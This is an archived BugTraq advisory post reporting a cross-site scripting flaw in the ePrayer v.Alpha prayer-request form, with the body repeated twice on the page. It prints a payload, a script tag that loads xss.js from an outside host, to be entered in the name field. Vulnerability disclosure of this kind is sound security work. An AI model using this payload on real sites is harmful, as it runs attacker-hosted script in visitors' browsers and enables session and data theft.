BugTraq
Back to list
|
Post reply
ePrayver v.Alpha - XSS
Jun 14 2006 09:36PM
luny youfucktard com
Eprayer v.Alpha.
Homepage:
http://eprayer.sourceforge.net
Affected files:
input boxs of prayer request.
User submitted data is not sanatized before being dynamically generated. Try putting the code below in as "Your name"
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/eprayer1.jpg
http://www.youfucktard.com/xsp/eprayer2.jpg
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Homepage:
http://eprayer.sourceforge.net
Affected files:
input boxs of prayer request.
User submitted data is not sanatized before being dynamically generated. Try putting the code below in as "Your name"
<SCRIPT SRC=http://youfucktard.com/xss.js></SCRIPT>
Screenshots:
http://www.youfucktard.com/xsp/eprayer1.jpg
http://www.youfucktard.com/xsp/eprayer2.jpg
[ reply ]